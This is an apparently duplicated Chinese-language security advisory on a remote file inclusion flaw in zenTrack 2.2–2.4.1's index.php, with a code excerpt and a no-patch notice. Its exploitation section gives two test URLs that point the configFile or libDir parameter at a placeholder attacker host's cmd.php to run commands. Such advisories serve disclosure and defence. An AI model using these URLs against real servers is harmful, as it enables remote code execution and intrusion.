Zentrack index.php远程文件包含漏洞
添加时间:
2005-10-02
系统编号:
WAVDB-00779
BUGTRAQ: 7843
影响版本:
zenTrack 2.2-2.4.1
程序介绍:
'$libDir'和'configFile'变量用于从用户输入中直接获得包含文件,当'index.php'脚本作为参数进行调用时由于没有进行初始化,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给'$libDir'和'configFile'变量,可导致以WEB服务进程权限执行PHP文件中包含的恶意代码。
漏洞利用:
解决方案:
厂商补丁:
Zendocs
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/zentrack/
信息来源:
<*
来源:farking (farking@i-ownur.info)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105493642707616&w=2
*>
2005-10-02
系统编号:
WAVDB-00779
BUGTRAQ: 7843
影响版本:
zenTrack 2.2-2.4.1
程序介绍:
zenTrack是一款跟踪工作,客户请求,并可对信息进行归档的应用系统。
漏洞分析:
zenTrack包含的'index.php'脚本对用户提供的变量缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
zenTrack的'header.php'脚本包含如下代码:
- :
- $libDir = "/web/zentrack/includes";
- $rootUrl = "http://www.yourhost.com/zentrack";
- $Debug_Mode = 0;
- $Demo_Mode = "off";
- $configFile = "$libDir/configVars.php";
- :
- ?>
漏洞利用:
farking (farking@i-ownur.info)提供了如下测试方法:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?cmd=pwd
或
http://[victim]/zentrack/www/index.php?libDir=http://[attacker]/test/&cmd=pwd
解决方案:
厂商补丁:
Zendocs
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/zentrack/
信息来源:
<*
来源:farking (farking@i-ownur.info)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105493642707616&w=2
*>